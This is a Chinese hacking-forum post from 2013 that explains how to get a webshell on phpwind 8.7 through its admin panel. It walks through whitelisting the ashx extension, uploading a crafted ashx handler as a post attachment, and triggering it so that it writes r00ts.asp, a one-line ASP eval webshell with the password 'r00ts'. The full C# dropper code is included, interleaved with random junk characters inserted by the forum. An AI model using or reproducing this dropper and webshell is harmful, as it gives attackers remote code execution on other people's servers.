找回密码
 立即注册
查看: 3347|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小8 l9 C' L, K7 ?# f, k

8 z9 p' w" p' m6 Y9 n$ a群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
) b0 Y( b3 B8 H" B  q- o2 P
2 s: l' h- o3 J发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
2 M, K, T/ e+ U$ b3 F# V- g
  f6 ~0 W# `6 d- T然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx: ]" d. c+ z& d1 w& X$ N: h
. U. a2 x) p0 E* e
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts2 H* f9 U& P/ I' ?& Q9 }
$ y% s9 M& k6 B  E  F& k- n+ @
下面是代码:
" z6 D8 @! p! i0 C; k% c2 j3 B " t# G4 [& p' f# W: J
<%@ WebHandler Language="C#"Class="Handler" %>8 E: l: ?/ P( _: {9 v4 j
using System;9 N# W/ n6 v/ h: Q. `7 i- l
using System.Web;
6 O: ?" y" D# A8 f( Busing System.IO;2 l; R" C! l$ p$ b
public class Handler : IHttpHandler {+ h7 T: |: n. N1 n9 Y4 _3 p& x
public void ProcessRequest (HttpContext context) {
1 ^. h) ~+ u+ R, j6 T  Fcontext.Response.ContentType = "text/plain";+ u3 P8 W- d* m2 @
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));3 }2 c- d/ G. \6 S# C7 j: p# Q
file1.Write("<%eval request(\"r00ts\")%>");
* K* x# K! R# Z8 q- \% e, s3 @file1.Flush();4 k/ ^  ?' W- C' F* l0 V8 b  ?
file1.Close();# D3 t# M" o1 n8 a1 M
}
+ w3 _, v1 q/ T9 Jpublic bool IsReusable {
7 W% h! w( i; j. ]4 z. P- v7 ^get {
7 z6 y( N, L! F. G( Sreturn false;# s. N( m4 q: p7 L
}
+ C; r/ ~' z$ K}
" p4 b( W# [; ^/ G6 B* K6 u}
- ]$ u9 R' y8 B) K7 Y/ B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表